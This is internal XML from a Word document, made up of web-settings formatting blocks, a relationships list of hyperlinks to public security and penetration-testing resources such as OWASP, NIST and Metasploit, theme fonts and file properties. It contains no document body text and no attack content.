        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="494147037">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="498540278">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="612174239">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1586452610">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="239291631">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2133211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9699906">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="663167539">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="728115654">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="938827823">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1027948150">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1152913270">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="492450027">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="203292890">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="686255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7144365">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1391919658">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="296108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2426237">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1381709759">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1159347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324149">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1322395314">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="527573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2482925">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1221478036">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="693114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69444237">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1206983269">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1222014911">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1258715808">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1423180615">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1433084188">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1520581292">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1554848309">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1748771590">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1866089945">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1876893268">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1887328145">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1009022677">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1531144043">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="550111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6523040">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2045061203">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2055540494">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2081511928">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="20865624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digininja/DVWA" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.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nvd.nist.gov/" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://documentation.alphagov.co.uk/documentation/penetration-testing/tools/ektron.htm" TargetMode="External"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SkyBulk/exploit-development/blob/master/codes/vulnserver.md" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.or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src.nist.gov/publications/detail/sp/800-53/rev-5/final" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ektron.com" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.enisa.europa.eu/publications/threat-landscape-report"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hyperlink" Target="https://www.ncsc.gov.uk/guidance/penetration-testing-framework"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metasploit.com/" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.offensive-security.com/pwk-osc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github.com/netdiscover/netdiscover" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kb.cert.org/vuls/" TargetMode="External"/><Relationship Id="rId75"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sans.org/critical-security-controls/"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vanhauser-thc/thc-hydra" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/remote/remote-desktop-services/rds-security-best-practices" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.grc.com/securitynow.htm"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code-crafters.com/abilityserver/" TargetMode="External"/><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owasp.org/top10/" TargetMode="External"/><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hyperlink" Target="https://www.issa.org/resources/penetration-testing-best-practices/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId2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Cambria"/>
        <a:ea typeface="Cambria"/>
        <a:cs typeface="Cambria"/>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43</Pages>
  <Words>5610</Words>
  <Characters>37665</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1086</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2024-04-11T12:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-18T13:55:00Z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96f194ac3e5c3fae523f2ab1b53adad51b02fdf988ae6b6308b9f0a256d9f4fc</vt:lpwstr>
  </property>
</Properties>
</file>